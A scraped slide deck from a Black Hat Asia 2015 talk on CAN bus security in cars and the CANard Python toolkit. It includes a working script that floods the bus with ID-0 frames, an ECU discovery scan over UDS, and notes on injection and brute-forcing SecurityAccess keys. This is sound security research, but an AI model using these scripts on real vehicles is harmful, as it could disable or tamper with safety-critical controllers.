hopping on the can bus
play

Hopping On the CAN Bus Automotive Security and the CANard Toolkit - PowerPoint PPT Presentation

May 23, 2023 •16 likes •326 views

Hopping On the CAN Bus Automotive Security and the CANard Toolkit Eric Evenchick Black Hat Asia 2015 What is CAN? Controller Area Network Low cost, integrated controllers Types: High speed (differential) Low speed (single

  1. Hopping On the CAN Bus Automotive Security and the CANard Toolkit Eric Evenchick Black Hat Asia 2015

  2. What is CAN? • Controller Area Network • Low cost, integrated controllers • Types: • High speed (differential) • Low speed (single ended) • Fault Tolerant • CAN FD

  3. Why do I care? • Used in: • Industrial Control Systems • SCADA • Pretty much every car • Direct interface with controllers

  4. How CAN Works • Bus : collection of collected controllers • Frame : a single CAN ‘packet’ consisting of: • Identifier - What is this message? • Data Length Code - How long is the data? • Data - What does it say?

  5. How CAN Works

  6. Easy Attacks - DoS while (1) { • Hardware Arbitration send_message_with_id_0(); • Lowest ID wins }

  7. How CAN Works Message Structure

  8. How CAN Works Message Structure

  9. Easy Attacks - Injection • “Trusted” network • All traffic is visible to all controllers • Any controller can send any message

  10. Easy Attacks - Injection

  12. Getting on the Bus • Hardware • USB to CAN • Software • Send and Receive Messages • Encode and Decode Data

  13. CAN Hardware • $$$$ - Vector, Kvaser • $$$ - Peak/GridConnect, ECOMCable • $$ - GoodThopter, OBDuino, CANtact • $ - ELM327 knockoffs (OBD-II)

  14. CAN Software • Proprietary Tools • SocketCAN & canutils • Wireshark • CANard

  15. SocketCAN ifconfig can0 up • CAN to Unix Network Interface cansend can0 123#112233 candump can0 • Included in Linux kernel cangen can0

  16. Wireshark • Trace CAN traffic • Filter, log, sort, etc…

  17. CANard A Python Toolkit for CAN • Hardware Abstraction • Protocol Implementation • Ease of Automation • Sharing of Information

  18. Hardware Abstraction from canard import can from canard.hw import socketcan # create a SocketCAN device dev = socketcan.SocketCanDev('can0') • Hardware devices as classes # start the device dev.start() • dev.start() # create a CAN frame frame = can.Frame(id=0x100) • dev.stop() frame.dlc = 8 frame.data = [1,2,3,4,5,6,7,8] # send the frame • dev.send() dev.send(frame) # receive a frame • dev.recv() frame = dev.recv() # stop the device dev.stop()

  19. DoS Example from canard import can from canard.hw import cantact # create and start device dev = cantact.CantactDev('/dev/cu.usbmodem14514') dev.start() # create our payload frame frame = can.Frame(id=0) frame.dlc = 8 # spam! while True: dev.send(frame)

  20. Diagnostics Protocols • OBD-II • Unified Diagnostic Services

  21. OBD-II • Read basic data • Engine RPM • Vehicle Speed • Throttle Position • Read Fault Codes • Clear Fault Codes

  22. Unified Diagnostic Services • ISO 14229 • Allows diagnostic access to controllers

  23. Unified Diagnostic Services

  24. Unified Diagnostic Services • SecurityAccess • RoutineControl • ReadDataByIdentifier • WriteDataByIdentifier • ReadMemoryByAddress • WriteMemoryByAddress

  25. UDS With CANard import sys from canard.proto.uds import UdsInterface from canard.hw.cantact import CantactDev d = CantactDev(sys.argv[1]) d.set_bitrate(500000) d.start() p = UdsInterface(d) # DiagnosticSessionControl Discovery for i in range(0x700, 0x800): # attempt to enter diagnostic session resp = p.uds_request(i, 0x10, [0x1], timeout=0.2) if resp != None: print ("ECU response for ID 0x%X!" % i)

  26. UDS SecurityAccess • Provides access to protected services Fixed! • Firmware upload 16 bits! • Modifying certain Fixed! variables

  27. Fuzzing Diagnostics • Automated Controller Discovery • Device Memory Mapping • Memory Dump • Determine Memory Permissions • RoutineControl Discovery • SecurityAccess Key Brute Force

  28. ECU AutoDiscovery import sys from canard.proto.uds import UdsInterface from canard.hw.cantact import CantactDev d = CantactDev(sys.argv[1]) d.set_bitrate(500000) d.start() Honda: p = UdsInterface(d) ECU Response for ID 0x740! # DiagnosticSessionControl Discovery for i in range(0x700, 0x800): # attempt to enter diagnostic session resp = p.uds_request(i, 0x10, [0x1], timeout=0.2) if resp != None: print ("ECU response for ID 0x%X!" % i)

  29. Conclusions • CAN Bus Attacks • Denial of Service • Injection • Diagnostics

  30. Conclusions • You will need • Hardware Interface • CANtact • Software Tools • CANard • Wireshark

  31. Thank you! Questions? http://github.com/ericevenchick/canard http://cantact.io @ericevenchick

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

School Improvement Plan Island Hopping 2016-17 Strategy Islands Shoreline - The SIP Map

School Improvement Plan Island Hopping 2016-17 Strategy Islands Shoreline - The SIP Map

School Improvement Plan Island Hopping 2016-17 Strategy Islands Shoreline - The SIP Map Charting the Course between islands, as opposed to a single journey directly to the destination. School Improvement Process Island hopping is the

418 views • 21 slides
Unraveling functional hole hopping pathways in the [4Fe4S]-containing DNA primase B Blue

Unraveling functional hole hopping pathways in the [4Fe4S]-containing DNA primase B Blue

Unraveling functional hole hopping pathways in the [4Fe4S]-containing DNA primase B Blue ue Wat aters rs has has enabl nabled d me me to de develop p forc rce field d parame parameters rs for r 3+ cl [F [Fe 4 S 4 ] 2+

521 views • 23 slides
Fat Heads Brewery Dry Hopping Techniques and Technology Hop Cannon is prepped and ready, hops

Fat Heads Brewery Dry Hopping Techniques and Technology Hop Cannon is prepped and ready, hops

Fat Heads Brewery Dry Hopping Techniques and Technology Hop Cannon is prepped and ready, hops are out of the box. CO2 is hooked up on the front port at the bottom. Close up of CO2 connection. Creates CO2 Blanket for loading hops.

324 views • 20 slides
Advanced techniques: Quantum treatment of nuclei and non-adiabatic (surface hopping) approaches

Advanced techniques: Quantum treatment of nuclei and non-adiabatic (surface hopping) approaches

Advanced techniques: Quantum treatment of nuclei and non-adiabatic (surface hopping) approaches Mauro Boero Institut de Physique et Chimie des Matriaux de Strasbourg University of Strasbourg - CNRS, F-67034 Strasbourg, France and @Institute

496 views • 39 slides
Single Legged Hopping Robot Noe Gonzalez Santa Barbara City College Electrical Engineering

Single Legged Hopping Robot Noe Gonzalez Santa Barbara City College Electrical Engineering

Spring Loaded Inverted Pendulum Single Legged Hopping Robot Noe Gonzalez Santa Barbara City College Electrical Engineering Mentor, Giulia Piovan Faculty Advisor, Dr. KaAe Byl ANewGenerationofRobots

200 views • 18 slides
Casino S hopping Events: Do s and Don ts Gary Galonek, National Sales Manager, Gaming

Casino S hopping Events: Do s and Don ts Gary Galonek, National Sales Manager, Gaming

Casino S hopping Events: Do s and Don ts Gary Galonek, National Sales Manager, Gaming (Principal) April 3-6, 2011 Starting 9 Considerations for Hosting a Casino Shopping Event 1. Timing a. Tie in with previously scheduled casino event

70 views • 6 slides
On line Power Optimization of Data Flow Multi-Core Architecture based on Vdd-Hopping for Local

On line Power Optimization of Data Flow Multi-Core Architecture based on Vdd-Hopping for Local

PATMOS 2010, Grenoble, France 20th Int. Workshop on Power And Timing Modeling, Optimization and Simulation On line Power Optimization of Data Flow Multi-Core Architecture based on Vdd-Hopping for Local DVFS Pascal Vivet 1 , Edith Beigne 1 , Hugo

749 views • 22 slides
Assisted hopping models of the active -absorbing state transition on a line Deepak Dhar Tata

Assisted hopping models of the active -absorbing state transition on a line Deepak Dhar Tata

Assisted hopping models of the active -absorbing state transition on a line Deepak Dhar Tata Institute of Fundamental Research Mumbai, INDIA G.G.I.T.P., Firenze, May 2014 Work done with Rahul Dandekar Published in R. Dandekar and DD,

207 views • 20 slides
Channel Assignment and Channel Hopping in IEEE 802.11 Operating Channels for 802.11b Europe

Channel Assignment and Channel Hopping in IEEE 802.11 Operating Channels for 802.11b Europe

Channel Assignment and Channel Hopping in IEEE 802.11 Operating Channels for 802.11b Europe (ETSI) channel 1 channel 7 channel 13 2400 2412 2442 2472 2483.5 [MHz] 22 MHz US (FCC)/Canada (IC) channel 1 channel 6 channel 11 2400

572 views • 44 slides
HotSpot: Automated Server Hopping in Cloud Spot Markets Supreeth Shastri and David Irwin

HotSpot: Automated Server Hopping in Cloud Spot Markets Supreeth Shastri and David Irwin

HotSpot: Automated Server Hopping in Cloud Spot Markets Supreeth Shastri and David Irwin Transient Servers are Ubiquitous in the Cloud Servers that may terminate anytime after an advance warning period Internal Use : Resource Spot Instances :

304 views • 17 slides
Ballisticity and Einstein relation in 1d Mott variable range hopping Alessandra Faggionato

Ballisticity and Einstein relation in 1d Mott variable range hopping Alessandra Faggionato

Ballisticity and Einstein relation in 1d Mott variable range hopping Alessandra Faggionato Department of Mathematics University La Sapienza Joint work with N. Gantert and M. Salvi Alessandra Faggionato Ballisticity and Einstein relation in

560 views • 28 slides
Spread Spectrum Concept Frequency Hopping Spread Spectrum Direct Sequence Spread

Spread Spectrum Concept Frequency Hopping Spread Spectrum Direct Sequence Spread

CMPE 477 Wireless and Mobile Networks Lecture 6: Spread Spectrum Concept Frequency Hopping Spread Spectrum Direct Sequence Spread Spectrum CMPE 477 Spread Spectrum Problem of radio transmission: frequency dependent fading can

656 views • 17 slides
Air Quality Hot Topics Florida Chambers 28 th Annual Environmental Permitting Summer

Air Quality Hot Topics Florida Chambers 28 th Annual Environmental Permitting Summer

Air Quality Hot Topics Florida Chambers 28 th Annual Environmental Permitting Summer School July 22-25, 2014 Marco Island, FL Robert A. Manning Hopping Green & Sams, P. A. Robert A. Manning Hop Hopping ing Green Green &

840 views • 80 slides
THE CAPE VERDE ARCHIPELAGO 2019-20 ISLAND HOPPING CRUISES IN VOLCANIC & VIBRANT LOCALES Aboard

THE CAPE VERDE ARCHIPELAGO 2019-20 ISLAND HOPPING CRUISES IN VOLCANIC & VIBRANT LOCALES Aboard

THE CAPE VERDE ARCHIPELAGO 2019-20 ISLAND HOPPING CRUISES IN VOLCANIC & VIBRANT LOCALES Aboard the 25-cabin M/Y Harmony V November December 2019 & March 2020 | 8-day cruises from Sal, Palmeira A cruise voyage the archipelago of Cape

342 views • 5 slides
Energy and Environmental Protection Backyard Exploration Series Spring is hopping! Connecticut

Energy and Environmental Protection Backyard Exploration Series Spring is hopping! Connecticut

Connecticut Department of Energy and Environmental Protection Backyard Exploration Series Spring is hopping! Connecticut Department of Energy and Environmental Protection Frogs are amphibians so they. Are true in ponds, streams and

320 views • 10 slides
Hopping in Medicinal Chemistry Nathan Brown Group Leader, In Silico Medicinal Chemistry Cancer

Hopping in Medicinal Chemistry Nathan Brown Group Leader, In Silico Medicinal Chemistry Cancer

in partnership with Bioisosteres and Scaffold Hopping in Medicinal Chemistry Nathan Brown Group Leader, In Silico Medicinal Chemistry Cancer Research UK Cancer Therapeutics Unit Division of Cancer Therapeutics The Institute of Cancer

575 views • 36 slides
Safe and Robust Robot Maneuvers Based on Reach Control Marijan Vukosavljev, Ivo Jansen, Mireille

Safe and Robust Robot Maneuvers Based on Reach Control Marijan Vukosavljev, Ivo Jansen, Mireille

Safe and Robust Robot Maneuvers Based on Reach Control Marijan Vukosavljev, Ivo Jansen, Mireille E. Broucke, Angela P. Schoellig Overview Hybrid Control Methodology Results 1 3 4 Novel hybrid control framework 1) The allowable region is that

312 views • 5 slides
AngularJS Introduction Directives, Modules, Expressions, Controllers Why Angular Good

AngularJS Introduction Directives, Modules, Expressions, Controllers Why Angular Good

AngularJS Introduction Directives, Modules, Expressions, Controllers Why Angular Good choice for creating dynamic website with JavaScript Angular helps you organize your JavaScript Angular helps you create responsive (fast) websites

657 views • 17 slides
Second Screen WG/CG TPAC 2019 - Day 1 Peter Thatcher (pthatcher@google.com) Mark Foltz

Second Screen WG/CG TPAC 2019 - Day 1 Peter Thatcher (pthatcher@google.com) Mark Foltz

Second Screen WG/CG TPAC 2019 - Day 1 Peter Thatcher (pthatcher@google.com) Mark Foltz (mfoltz@google.com) Fukuoka September 2019 Day 1 - Outline Introductions, Agenda Bashing OSP 1.0 Spec: Remote Playback cont'd, Streaming Overview &

1.15k views • 113 slides
2D GAMES AS CYBER-PHYSICAL SYSTEMS VIDYA NARAYANAN 1 MOTIVATION Physics based games with

2D GAMES AS CYBER-PHYSICAL SYSTEMS VIDYA NARAYANAN 1 MOTIVATION Physics based games with

2D GAMES AS CYBER-PHYSICAL SYSTEMS VIDYA NARAYANAN 1 MOTIVATION Physics based games with discrete game controllers are hybrid systems Impossible games are no fun Game designs need correctness or playability guarantees

328 views • 30 slides
Generalized Model Predictive Control (Discretely Generalized MPC) Sa sa V. Rakovi c, Ph.D.

Generalized Model Predictive Control (Discretely Generalized MPC) Sa sa V. Rakovi c, Ph.D.

Generalized Model Predictive Control (Discretely Generalized MPC) Sa sa V. Rakovi c, Ph.D. DIC CSR @ UT Austin ISR @ UMD College Park, February 24, 2016 Opening Model Predictive Control of the Day Before Yesterday Model Predictive

515 views • 37 slides
Holistic Control for Wireless Control Systems Yehan Ma CSE 521S Industrial Process Automation

Holistic Control for Wireless Control Systems Yehan Ma CSE 521S Industrial Process Automation

Holistic Control for Wireless Control Systems Yehan Ma CSE 521S Industrial Process Automation Large Scale Challenging environment q Physical plant Relative low speed q Network communication Stability is critical q Health, Safety, and

391 views • 38 slides
Consistency in SDN Aurojit Panda, Wenting Zheng, Xiaohe Hu, Arvind Krishnamurthy, Scott Shenker

Consistency in SDN Aurojit Panda, Wenting Zheng, Xiaohe Hu, Arvind Krishnamurthy, Scott Shenker

Consistency in SDN Aurojit Panda, Wenting Zheng, Xiaohe Hu, Arvind Krishnamurthy, Scott Shenker Distributed SDN Today Replicated Replicated Replicated Controller Controller Controller Consistency Layer Switch Switch Switch Switch

729 views • 39 slides
From Control Model to Program: Investigating Robotic Aerial Vehicle Accidents with M AYDAY Taegyu

From Control Model to Program: Investigating Robotic Aerial Vehicle Accidents with M AYDAY Taegyu

From Control Model to Program: Investigating Robotic Aerial Vehicle Accidents with M AYDAY Taegyu Kim 1 , Chung Hwan Kim 2 , Altay Ozen 1 , Fan Fei 1 , Zhan Tu 1 , Xiangyu Zhang 1 , Xinyan Deng 1 , Dave (Jing) Tian 1 , Dongyan Xu 1 1 Purdue

517 views • 17 slides

More recommend